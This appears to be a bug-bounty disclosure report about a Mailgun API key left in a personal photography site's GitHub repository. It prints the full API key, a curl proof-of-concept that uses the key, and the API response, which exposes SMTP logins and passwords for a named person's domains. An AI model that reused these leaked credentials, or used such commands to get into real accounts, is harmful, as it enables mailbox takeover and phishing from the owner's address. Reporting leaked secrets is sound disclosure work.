Insufficiently Protected Credentials in hotrodzphotography/hotrodzphotography.github.io

Valid

Reported on

May 3rd 2021


✍️ Description

Private mailgun API key found in https://github.com/hotrodzphotography/hotrodzphotography.github.io/blob/1e8d0227f3558f3df8140ee0042867fcb1146379/src/views/Contact.vue#L48 90e27fb32160148dc1cc3890ef601355'

🕵️‍♂️ Proof of Concept

curl --user 'api:key-90e27fb32160148dc1cc3890ef601355' "https://api.mailgun.net/v3/domains"
{
    "items": [{
            "created_at": "Tue, 22 Dec 2015 00:05:45 GMT",
            "id": "567893d980326765b14ca4dd",
            "is_disabled": false,
            "name": "michaelrodrigues.com",
            "require_tls": false,
            "skip_verification": false,
            "smtp_login": "postmaster@michaelrodrigues.com",
            "smtp_password": "a0ffc6572973c4bc5295fc2dc0277f6f",
            "spam_action": "disabled",
            "state": "unverified",
            "type": "custom",
            "web_prefix": "email",
            "web_scheme": "http",
            "wildcard": false
        },
        {
            "created_at": "Tue, 22 Dec 2015 00:02:18 GMT",
            "id": "5678930a78fa163bbd416ce0",
            "is_disabled": false,
            "name": "sandbox9fe48d38ba29476a918ece4c8b7700ec.mailgun.org",
            "require_tls": false,
            "skip_verification": false,
            "smtp_login": "postmaster@sandbox9fe48d38ba29476a918ece4c8b7700ec.mailgun.org",
            "smtp_password": "8435aa3e9fa23b2ab918eca94bead67d",
            "spam_action": "disabled",
            "state": "active",
            "type": "sandbox",
            "web_prefix": "email",
            "web_scheme": "http",
            "wildcard": false
        }
    ],
    "total_count": 2
}

💥 Impact

smtp_password, direct access to the mailbox + phishing campaigns from your email